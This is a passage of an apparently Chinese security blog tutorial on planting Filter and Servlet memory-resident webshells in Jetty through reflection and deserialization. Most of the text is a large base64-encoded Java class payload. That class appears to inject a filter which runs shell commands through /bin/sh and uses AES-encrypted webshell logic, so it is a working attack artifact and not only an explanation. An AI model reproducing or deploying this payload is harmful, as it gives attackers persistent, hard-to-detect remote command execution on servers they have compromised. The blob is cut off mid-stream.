参考文章:
https://github.com/feihong-cs/memShell/blob/master/src/main/java/com/memshell/generic/FilterTemplate.java
https://github.com/su18/MemoryShell/blob/main/memshell-test/memshell-test-jetty/src/org/su18/memshell/test/jetty/AddJettyFilter.java
https://github.com/BeichenDream/GodzillaMemoryShellProject/blob/main/JettyMemoryShell/src/AesBase64JettyFilterShell.java
https://xz.aliyun.com/t/12182#toc-4
环境搭建,依赖文件
1 | <!-- https://mvnrepository.com/artifact/org.eclipse.jetty/jetty-server --> |
测试版本
Jetty 9.4.52最新版
Filter内存马
内存马构造
首先是注入部分。
1 | package com.boogipop.memshell; |
其中有一个FilterTemplates也就是要注入的filter,其逻辑如下,可以自定义假如冰蝎和哥斯拉的逻辑
1 | package com.boogipop.memshell; |
假如是反序列化注入的话直接用
1 | import com.sun.org.apache.xalan.internal.xsltc.DOM; |
这样加载恶意类即可。但是别忘了,我们要选择方法二注册恶意filter,具体原因会在流程分析中说到.
流程分析
首先有个正常的servlet,给个断点看看调用栈。
可以发现有个ServletHandler,我们跟进看看他方法
它这有2个方法,addServeltWithMapping和addFilterwithMapping。我们这里需要添加的是Filter。所以思路就是先获取ServletHandler然后再反射调用该方法。
该方法需要3个参数,恶意的filter,pathsec,dispatches,我们传入即可。
进来后先加载了恶意Filter到classloader类加载器里去。
然后获取了ServletHandler,这里用到的工具也是之前说过的java-search-object
最后就是注入Filter,也就是说的反射调用
在该方法内对_filters属性进行了修改
但是最后还需注意一个问题。
由于有一个内置的filter排在我们恶意添加的filter之前,因此我们需要手动排序一下,将恶意filter置于首位。
1 | for(j = 0; j < Array.getLength(filterMaps); ++j) { |
这样当我们访问webshell的时候先触发的是内存马的filter。
调用了this.getFilter()
返回了_filters
然后就是进入该filter的dofilter进行命令执行。
Servlet内存马
Servlet其实也是一样的。我们刚刚提到有一个addServletMapping方法。
内存马构造
这里就不进行调试直接给payload了,因为感觉都一模一样
1 | package com.boogipop.memshell; |
ServletTempaltes如下
1 | package com.boogipop.memshell; |
感觉还是不太难。
1 | yv66vgAAADQBEgoAKACkCgClAKYKAFIApwoAqACpCgCoAKoJAEAAqwoACgCsCgAMAK0HAK4HAK8IALAHALEHAFAJALIAswoADAC0CgCLALUIALYKAEAAtwcAuAoAsgC5CgCLALoIAGMKAEAAuwgAZAgAvAkAQAC9CgAJAL4HAL8IAMAHAMEKABMAwgoADADDCADECgAMAMUKAMYAtQoAxgDHCABtCgAMAMgIAG4HAMkJAEAAyggAywgAcQgAcgkAQADMCAB0CgAeAM0JAM4AzwgA0AoA0QDSCgAMANMHANQKAH0AtQoAfQDVBwDWCgA3ANcKAEIA2AoAQADZCgBAANoKAEAA2wgAZggA3AgA3QcA3goAQADYBwDfAQAOc2VydmxldEhhbmRsZXIBABJMamF2YS9sYW5nL09iamVjdDsBAApmaWx0ZXJOYW1lAQASTGphdmEvbGFuZy9TdHJpbmc7AQAPZmlsdGVyQ2xhc3NOYW1lAQADdXJsAQANQkFTRTY0RGVjb2RlcgEAFihMamF2YS9sYW5nL1N0cmluZzspW0IBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEZGF0YQEACmlucHV0Qnl0ZXMBAAJbQgEAB2VuY29kZXIHAOABAAdEZWNvZGVyAQAMSW5uZXJDbGFzc2VzAQAaTGphdmEvdXRpbC9CYXNlNjQkRGVjb2RlcjsBAAxlbmNvZGVkQnl0ZXMBAApMb2FkRmlsdGVyAQADKClWAQABYQEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQABYgEAAWUBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAA1TdGFja01hcFRhYmxlAQAKRXhjZXB0aW9ucwEADUdldFdlYkNvbnRlbnQBAA1jdXJyZW50VGhyZWFkAQASTGphdmEvbGFuZy9UaHJlYWQ7AQASY29udGV4dENsYXNzTG9hZGVyAQAIX2NvbnRleHQBAAxJbmplY3RGaWx0ZXIBAAdIRmlsdGVyAQAYTGpha2FydGEvc2VydmxldC9GaWx0ZXI7AQASZmlsdGVyUGF0aE1hcHBpbmdzAQAVTGphdmEvdXRpbC9BcnJheUxpc3Q7AQAMY29uc3RydWN0b3IyAQAfTGphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yOwEADGZpbHRlckhvbGRlcgEACXNldEZpbHRlcgEAB3NldE5hbWUBAAtjb25zdHJ1Y3RvcgEADWZpbHRlck1hcHBpbmcBAA1zZXRGaWx0ZXJOYW1lAQAPc2V0RmlsdGVySG9sZGVyAQAJcGF0aFNwZWNzAQALc2V0UGF0aFNwZWMBAAhHZXRGaWVsZAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9PYmplY3Q7AQABZgEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAJlMQEAIExqYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb247AQABbwEAAWsHAOEBAAlHZXRNZXRob2QBAFIoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAEdmFyNgEAIUxqYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uOwEAA29iagEACm1ldGhvZE5hbWUBAApwYXJhbUNsYXp6AQASW0xqYXZhL2xhbmcvQ2xhc3M7AQAGbWV0aG9kAQAFY2xhenoBABFMamF2YS9sYW5nL0NsYXNzOwEAFkxvY2FsVmFyaWFibGVUeXBlVGFibGUBABVbTGphdmEvbGFuZy9DbGFzczwqPjsHAOIBAAlTaWduYXR1cmUBAFUoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M8Kj47KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAGPGluaXQ+AQAEdGhpcwEAKUxjb20vYm9vZ2lwb3AvbWVtc2hlbGwvSW5qZWN0SmV0dHlGaWx0ZXI7AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwcA4wEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEACDxjbGluaXQ+AQAKU291cmNlRmlsZQEAFkluamVjdEpldHR5RmlsdGVyLmphdmEMAOQA5QcA5gwA5wDoDADpAOoHAOsMAGEA7AwA7QDuDABHAEYMAO8A8AwA8QDyAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzAQAPamF2YS9sYW5nL0NsYXNzBwDzDAD0AIgMAPUA9gwA9wD4ARhUeXY2NnZnQUFBRElCR3dvQVF3QjdDUUI4QUgwSUFINEtBSDhBZ0FnQWdRc0FRQUNDQ0FDRENnQU5BSVFLQUlVQWhnb0FEUUNIQ1FDSUFJa0lBSW9IQUlzSUFJd0lBSTBJQUY4SUFJNEhBSThLQUpBQWtRb0FrQUNTQ2dDVEFKUUtBQklBbFFnQWxnb0FFZ0NYQ2dBU0FKZ0xBRUVBbVFvQW1nQ0FCd0NiQ2dDRkFKd0xBQndBblFzQUhBQ2VDQUNmQ2dDRkFLQUxBQndBb1FnQW9nc0Fvd0NrQ0FDbENnQ21BS2NIQUtnSEFLa0tBQ2dBZXdzQW93Q3FDZ0FvQUtzSUFLd0tBQ2dBclFvQUtBQ3VDZ0FOQUs4S0FDY0FzQW9BcGdDeEJ3Q3lDZ0F5QUhzTEFFQUFzd29BdEFDMUNnQXlBTFlLQUtZQXR3Y0F1QW9BUXdDNUNnQS9BTG9LQURnQXV3b0FPQUM4Q2dBL0FMMElBTDRIQUw4SEFNQUhBTUVLQUQ4QXdnY0F3d29BeEFERkJ3REdDZ0JGQU1jTEFNZ0F5UWNBeWdjQXl3RUFBVlVCQUF4SmJtNWxja05zWVhOelpYTUJBQVk4YVc1cGRENEJBQU1vS1ZZQkFBUkRiMlJsQVFBUFRHbHVaVTUxYldKbGNsUmhZbXhsQVFBU1RHOWpZV3hXWVhKcFlXSnNaVlJoWW14bEFRQUVkR2hwY3dFQUpreGpiMjB2WW05dloybHdiM0F2YldWdGMyaGxiR3d2Um1sc2RHVnlWR1Z0Y0d4aGRHVTdBUUFFYVc1cGRBRUFIeWhNYW1GMllYZ3ZjMlZ5ZG14bGRDOUdhV3gwWlhKRGIyNW1hV2M3S1ZZQkFBeG1hV3gwWlhKRGIyNW1hV2NCQUJ4TWFtRjJZWGd2YzJWeWRteGxkQzlHYVd4MFpYSkRiMjVtYVdjN0FRQUtSWGhqWlhCMGFXOXVjd2NBekFFQUNHUnZSbWxzZEdWeUFRQmJLRXhxWVhaaGVDOXpaWEoyYkdWMEwxTmxjblpzWlhSU1pYRjFaWE4wTzB4cVlYWmhlQzl6WlhKMmJHVjBMMU5sY25ac1pYUlNaWE53YjI1elpUdE1hbUYyWVhndmMyVnlkbXhsZEM5R2FXeDBaWEpEYUdGcGJqc3BWZ0VBQkdOdFpITUJBQk5iVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3QVFBR2NtVnpkV3gwQVFBU1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0FRQURZMjFrQVFBQmF3RUFCbU5wY0dobGNnRUFGVXhxWVhaaGVDOWpjbmx3ZEc4dlEybHdhR1Z5T3dFQURtVjJhV3hEYkdGemMwSjVkR1Z6QVFBQ1cwSUJBQWxsZG1sc1EyeGhjM01CQUJGTWFtRjJZUzlzWVc1bkwwTnNZWE56T3dFQUNtVjJhV3hQWW1wbFkzUUJBQkpNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNCQUF4MFlYSm5aWFJOWlhSb2IyUUJBQnBNYW1GMllTOXNZVzVuTDNKbFpteGxZM1F2VFdWMGFHOWtPd0VBQVdVQkFCVk1hbUYyWVM5c1lXNW5MMFY0WTJWd2RHbHZianNCQUE1elpYSjJiR1YwVW1WeGRXVnpkQUVBSGt4cVlYWmhlQzl6WlhKMmJHVjBMMU5sY25ac1pYUlNaWEYxWlhOME93RUFEM05sY25ac1pYUlNaWE53YjI1elpRRUFIMHhxWVhaaGVDOXpaWEoyYkdWMEwxTmxjblpzWlhSU1pYTndiMjV6WlRzQkFBdG1hV3gwWlhKRGFHRnBiZ0VBRzB4cVlYWmhlQzl6WlhKMmJHVjBMMFpwYkhSbGNrTm9ZV2x1T3dFQURWTjBZV05yVFdGd1ZHRmliR1VIQUlzSEFGd0hBTVlIQU0wQkFBZGtaWE4wY205NUFRQUtVMjkxY21ObFJtbHNaUUVBRTBacGJIUmxjbFJsYlhCc1lYUmxMbXBoZG1FTUFFd0FUUWNBemd3QXp3RFFBUUFkV3l0ZElFUjVibUZ0YVdNZ1JtbHNkR1Z5SUhOaGVYTWdhR1ZzYkc4SEFORU1BTklBMHdFQUJIUjVjR1VNQU5RQTFRRUFCV0poYzJsakRBQytBTllIQU5jTUFOZ0EyUXdBMmdEYkJ3RGNEQURkQUY0QkFBRXZBUUFRYW1GMllTOXNZVzVuTDFOMGNtbHVad0VBQnk5aWFXNHZjMmdCQUFJdFl3RUFBaTlEQVFBUmFtRjJZUzkxZEdsc0wxTmpZVzV1WlhJSEFONE1BTjhBNEF3QTRRRGlCd0RqREFEa0FPVU1BRXdBNWdFQUFseEJEQURuQU9nTUFPa0EyUXdBNmdEckJ3RHNBUUFsYW1GMllYZ3ZjMlZ5ZG14bGRDOW9kSFJ3TDBoMGRIQlRaWEoyYkdWMFVtVnhkV1Z6ZEF3QTdRRFpEQUR0QU5VTUFPNEEyUUVBQkZCUFUxUU1BTzhBMlF3QThBRHhBUUFCZFFjQThnd0E4d0QwQVFBRFFVVlRCd0QxREFEMkFQY0JBQjlxWVhaaGVDOWpjbmx3ZEc4dmMzQmxZeTlUWldOeVpYUkxaWGxUY0dWakFRQVhhbUYyWVM5c1lXNW5MMU4wY21sdVowSjFhV3hrWlhJTUFQZ0ErUXdBK2dEN0FRQUFEQUQ2QVB3TUFQMEEyUXdBL2dEL0RBQk1BUUFNQUZNQkFRRUFGbk4xYmk5dGFYTmpMMEpCVTBVMk5FUmxZMjlrWlhJTUFRSUJBd2NCQkF3QkJRRFpEQUVHQVFjTUFRZ0JDUUVBSm1OdmJTOWliMjluYVhCdmNDOXRaVzF6YUdWc2JDOUdhV3gwWlhKVVpXMXdiR0YwWlNSVkRBRUtBUXNNQVF3QkRRd0FUQUVPREFFUEFSQU1BUkVCRWdFQUJtVnhkV0ZzY3dFQUQycGhkbUV2YkdGdVp5OURiR0Z6Y3dFQUhHcGhkbUY0TDNObGNuWnNaWFF2VTJWeWRteGxkRkpsY1hWbGMzUUJBQjFxWVhaaGVDOXpaWEoyYkdWMEwxTmxjblpzWlhSU1pYTndiMjV6WlF3QkV3RVVBUUFRYW1GMllTOXNZVzVuTDA5aWFtVmpkQWNCRlF3QkZnRVhBUUFUYW1GMllTOXNZVzVuTDBWNFkyVndkR2x2Ymd3QkdBQk5Cd0VaREFCWkFSb0JBQ1JqYjIwdlltOXZaMmx3YjNBdmJXVnRjMmhsYkd3dlJtbHNkR1Z5VkdWdGNHeGhkR1VCQUJScVlYWmhlQzl6WlhKMmJHVjBMMFpwYkhSbGNnRUFIbXBoZG1GNEwzTmxjblpzWlhRdlUyVnlkbXhsZEVWNFkyVndkR2x2YmdFQUUycGhkbUV2YVc4dlNVOUZlR05sY0hScGIyNEJBQkJxWVhaaEwyeGhibWN2VTNsemRHVnRBUUFEYjNWMEFRQVZUR3BoZG1FdmFXOHZVSEpwYm5SVGRISmxZVzA3QVFBVGFtRjJZUzlwYnk5UWNtbHVkRk4wY21WaGJRRUFCM0J5YVc1MGJHNEJBQlVvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1ZZQkFBeG5aWFJRWVhKaGJXVjBaWElCQUNZb1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0tVeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk93RUFGU2hNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNwV2dFQUhHTnZiUzlpYjI5bmFYQnZjQzl0WlcxemFHVnNiQzlEYjI1bWFXY0JBQXRuWlhSUVlYTnpkMjl5WkFFQUZDZ3BUR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdBUUFIYVhORmJYQjBlUUVBQXlncFdnRUFER3BoZG1FdmFXOHZSbWxzWlFFQUNYTmxjR0Z5WVhSdmNnRUFFV3BoZG1FdmJHRnVaeTlTZFc1MGFXMWxBUUFLWjJWMFVuVnVkR2x0WlFFQUZTZ3BUR3BoZG1FdmJHRnVaeTlTZFc1MGFXMWxPd0VBQkdWNFpXTUJBQ2dvVzB4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3lsTWFtRjJZUzlzWVc1bkwxQnliMk5sYzNNN0FRQVJhbUYyWVM5c1lXNW5MMUJ5YjJObGMzTUJBQTVuWlhSSmJuQjFkRk4wY21WaGJRRUFGeWdwVEdwaGRtRXZhVzh2U1c1d2RYUlRkSEpsWVcwN0FRQVlLRXhxWVhaaEwybHZMMGx1Y0hWMFUzUnlaV0Z0T3lsV0FRQU1kWE5sUkdWc2FXMXBkR1Z5QVFBbktFeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk95bE1hbUYyWVM5MWRHbHNMMU5qWVc1dVpYSTdBUUFFYm1WNGRBRUFDV2RsZEZkeWFYUmxjZ0VBRnlncFRHcGhkbUV2YVc4dlVISnBiblJYY21sMFpYSTdBUUFUYW1GMllTOXBieTlRY21sdWRGZHlhWFJsY2dFQUNXZGxkRWhsWVdSbGNnRUFDV2RsZEUxbGRHaHZaQUVBRm1kbGRFSmxhR2x1WkdWeVUyaGxiR3hRZDJSUWQyUUJBQXBuWlhSVFpYTnphVzl1QVFBaUtDbE1hbUYyWVhndmMyVnlkbXhsZEM5b2RIUndMMGgwZEhCVFpYTnphVzl1T3dFQUhtcGhkbUY0TDNObGNuWnNaWFF2YUhSMGNDOUlkSFJ3VTJWemMybHZiZ0VBREhObGRFRjBkSEpwWW5WMFpRRUFKeWhNYW1GMllTOXNZVzVuTDFOMGNtbHVaenRNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNwVmdFQUUycGhkbUY0TDJOeWVYQjBieTlEYVhCb1pYSUJBQXRuWlhSSmJuTjBZVzVqWlFFQUtTaE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1GNEwyTnllWEIwYnk5RGFYQm9aWEk3QVFBTVoyVjBRWFIwY21saWRYUmxBUUFtS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3lsTWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzQkFBWmhjSEJsYm1RQkFDMG9UR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVXhxWVhaaEwyeGhibWN2VTNSeWFXNW5RblZwYkdSbGNqc0JBQzBvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuUW5WcGJHUmxjanNCQUFoMGIxTjBjbWx1WndFQUNHZGxkRUo1ZEdWekFRQUVLQ2xiUWdFQUZ5aGJRa3hxWVhaaEwyeGhibWN2VTNSeWFXNW5PeWxXQVFBWEtFbE1hbUYyWVM5elpXTjFjbWwwZVM5TFpYazdLVllCQUFsblpYUlNaV0ZrWlhJQkFCb29LVXhxWVhaaEwybHZMMEoxWm1abGNtVmtVbVZoWkdWeU93RUFGbXBoZG1FdmFXOHZRblZtWm1WeVpXUlNaV0ZrWlhJQkFBaHlaV0ZrVEdsdVpRRUFER1JsWTI5a1pVSjFabVpsY2dFQUZpaE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BXMElCQUFka2IwWnBibUZzQVFBR0tGdENLVnRDQVFBSVoyVjBRMnhoYzNNQkFCTW9LVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBUUFPWjJWMFEyeGhjM05NYjJGa1pYSUJBQmtvS1V4cVlYWmhMMnhoYm1jdlEyeGhjM05NYjJGa1pYSTdBUUJBS0V4amIyMHZZbTl2WjJsd2IzQXZiV1Z0YzJobGJHd3ZSbWxzZEdWeVZHVnRjR3hoZEdVN1RHcGhkbUV2YkdGdVp5OURiR0Z6YzB4dllXUmxjanNwVmdFQUFXY0JBQlVvVzBJcFRHcGhkbUV2YkdGdVp5OURiR0Z6Y3pzQkFBdHVaWGRKYm5OMFlXNWpaUUVBRkNncFRHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN0FRQVJaMlYwUkdWamJHRnlaV1JOWlhSb2IyUUJBRUFvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3VzB4cVlYWmhMMnhoYm1jdlEyeGhjM003S1V4cVlYWmhMMnhoYm1jdmNtVm1iR1ZqZEM5TlpYUm9iMlE3QVFBWWFtRjJZUzlzWVc1bkwzSmxabXhsWTNRdlRXVjBhRzlrQVFBR2FXNTJiMnRsQVFBNUtFeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME8xdE1hbUYyWVM5c1lXNW5MMDlpYW1WamREc3BUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdBUUFQY0hKcGJuUlRkR0ZqYTFSeVlXTmxBUUFaYW1GMllYZ3ZjMlZ5ZG14bGRDOUdhV3gwWlhKRGFHRnBiZ0VBUUNoTWFtRjJZWGd2YzJWeWRteGxkQzlUWlhKMmJHVjBVbVZ4ZFdWemREdE1hbUYyWVhndmMyVnlkbXhsZEM5VFpYSjJiR1YwVW1WemNHOXVjMlU3S1ZZQUlRQklBRU1BQVFCSkFBQUFCQUFCQUV3QVRRQUJBRTRBQUFBdkFBRUFBUUFBQUFVcXR3QUJzUUFBQUFJQVR3QUFBQVlBQVFBQUFBd0FVQUFBQUF3QUFRQUFBQVVBVVFCU0FBQUFBUUJUQUZRQUFnQk9BQUFBTlFBQUFBSUFBQUFCc1FBQUFBSUFUd0FBQUFZQUFRQUFBQkFBVUFBQUFCWUFBZ0FBQUFFQVVRQlNBQUFBQUFBQkFGVUFWZ0FCQUZjQUFBQUVBQUVBV0FBQkFGa0FXZ0FDQUU0QUFBTEZBQWNBQ2dBQUFZcXlBQUlTQTdZQUJDc1NCYmtBQmdJQXhnQ1FLeElGdVFBR0FnQVNCN1lBQ0prQWdDdTRBQW01QUFZQ0FEb0VHUVRHQUcwWkJMWUFDcG9BWlFFNkJiSUFDeElNdGdBSW1RQWJCcjBBRFZrREVnNVRXUVFTRDFOWkJSa0VVem9GcHdBWUJyMEFEVmtERWhCVFdRUVNFVk5aQlJrRVV6b0Z1d0FTV2JnQUV4a0Z0Z0FVdGdBVnR3QVdFaGUyQUJpMkFCazZCaXk1QUJvQkFCa0d0Z0FicHdEc0s4QUFITGdBSGJrQUhnSUF4Z0RWSzhBQUhMa0FId0VBRWlDMkFBaVpBTGU0QUNFNkJDdkFBQnk1QUNJQkFCSWpHUVM1QUNRREFCSWx1QUFtT2dVWkJRVzdBQ2RadXdBb1diY0FLU3ZBQUJ5NUFDSUJBQklqdVFBcUFnQzJBQ3NTTExZQUxiWUFMcllBTHhJbHR3QXd0Z0F4R1FXN0FESlp0d0F6SzdrQU5BRUF0Z0ExdGdBMnRnQTNPZ2E3QURoWktpcTJBRG0yQURxM0FEc1pCcllBUERvSEdRZTJBRDA2Q0JrSEVqNEZ2UUEvV1FNU1FGTlpCQkpCVTdZQVFqb0pHUWtaQ0FXOUFFTlpBeXRUV1FRc1U3WUFSRmVuQUJVNkJCa0V0Z0JHcHdBTExTc3N1UUJIQXdDeEFBRUFyd0YwQVhjQVJRQURBRThBQUFCdUFCc0FBQUFVQUFnQUZnQWpBQmdBTGdBWkFEc0FHZ0ErQUJzQVNRQWNBR0VBSGdCMkFDQUFrZ0FoQUowQUl3Q3ZBQ1lBd0FBbkFNVUFLQURYQUNrQTNnQXFBUklBS3dFc0FDd0JRZ0F0QVVrQUxnRmdBQzhCZEFBekFYY0FNUUY1QURJQmZnQXpBWUVBTlFHSkFEY0FVQUFBQUk0QURnQStBRjhBV3dCY0FBVUFrZ0FMQUYwQVhnQUdBQzRBYndCZkFGNEFCQURGQUs4QVlBQmVBQVFBM2dDV0FHRUFZZ0FGQVN3QVNBQmpBR1FBQmdGQ0FESUFaUUJtQUFjQlNRQXJBR2NBYUFBSUFXQUFGQUJwQUdvQUNRRjVBQVVBYXdCc0FBUUFBQUdLQUZFQVVnQUFBQUFCaWdCdEFHNEFBUUFBQVlvQWJ3QndBQUlBQUFHS0FIRUFjZ0FEQUhNQUFBQVpBQWo5QUdFSEFIUUhBSFVVK1FBbUF2c0EwMElIQUhZSkJ3QlhBQUFBQmdBQ0FIY0FXQUFCQUhnQVRRQUJBRTRBQUFBckFBQUFBUUFBQUFHeEFBQUFBZ0JQQUFBQUJnQUJBQUFBUEFCUUFBQUFEQUFCQUFBQUFRQlJBRklBQUFBQ0FIa0FBQUFDQUhvQVN3QUFBQW9BQVFBNEFFZ0FTZ0FBDABJAEoBABBqYXZhL2xhbmcvT2JqZWN0DAD5APoMAPsA/AwAdQB2AQAPX3NlcnZsZXRIYW5kbGVyDABDAEQMAP0AWAEAFmpha2FydGEvc2VydmxldC9GaWx0ZXIBABNfZmlsdGVyUGF0aE1hcHBpbmdzAQATamF2YS91dGlsL0FycmF5TGlzdAwA/gD/DAEAAO4BACZvcmcuZWNsaXBzZS5qZXR0eS5zZXJ2bGV0LkZpbHRlckhvbGRlcgwBAQECBwEDDADxAQQMAQUA/wEAEGphdmEvbGFuZy9TdHJpbmcMAEUARgEAJ29yZy5lY2xpcHNlLmpldHR5LnNlcnZsZXQuRmlsdGVyTWFwcGluZwwASABGDAEGAQcHAQgMAQkBCgEAAzEyMwcBCwwBDAENDAEOAQ8BAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24MARABEQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24MAI4BDQwAjgBYDABXAFgMAGAAWAwAZQBYAQALY29tLkhGaWx0ZXIBAAIvKgEAJ2NvbS9ib29naXBvcC9tZW1zaGVsbC9JbmplY3RKZXR0eUZpbHRlcgEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABhqYXZhL3V0aWwvQmFzZTY0JERlY29kZXIBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEACGdldEJ5dGVzAQAEKClbQgEAEGphdmEvdXRpbC9CYXNlNjQBAApnZXREZWNvZGVyAQAcKClMamF2YS91dGlsL0Jhc2U2NCREZWNvZGVyOwEABmRlY29kZQEABihbQilbQgEAEGphdmEvbGFuZy9UaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAAlsb2FkQ2xhc3MBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEAEWphdmEvbGFuZy9JbnRlZ2VyAQAEVFlQRQEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA9wcmludFN0YWNrVHJhY2UBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAA5nZXRDbGFzc0xvYWRlcgEAFmdldERlY2xhcmVkQ29uc3RydWN0b3IBADMoW0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcjsBAB1qYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcgEAJyhbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEADWdldFN1cGVyY2xhc3MBAANhZGQBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBABBqYXZhL2xhbmcvU3lzdGVtAQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsAIQBAAEIAAAAEAAoAQwBEAAAACgBFAEYAAAAKAEcARgAAAAoASABGAAAACwAKAEkASgABAEsAAABlAAIABAAAABEqtgABTLgAAk0sK7YAA04tsAAAAAIATAAAABIABAAAABoABQAbAAkAHAAPAB0ATQAAACoABAAAABEATgBGAAAABQAMAE8AUAABAAkACABRAFUAAgAPAAIAVgBQAAMAKgBXAFgAAgBLAAAA0AAGAAMAAABfuAAEtgAFsgAGtgAHtgAIV6cATksSChILBr0ADFkDEg1TWQSyAA5TWQWyAA5TtgAPTCsEtgAQEhG4ABJNK7gABLYABQa9ABNZAyxTWQQDuAAUU1kFLL64ABRTtgAVV7EAAQAAABAAEwAJAAMATAAAACIACAAAACEAEAAnABMAIgAUACMAMQAkADYAJQA8ACYAXgAoAE0AAAAgAAMAMQAtAFkAWgABADwAIgBbAFAAAgAUAEoAXABdAAAAXgAAAAkAAlMHAAn7AEoAXwAAAAQAAQAJACkAYABYAAIASwAAAJ0AAgADAAAA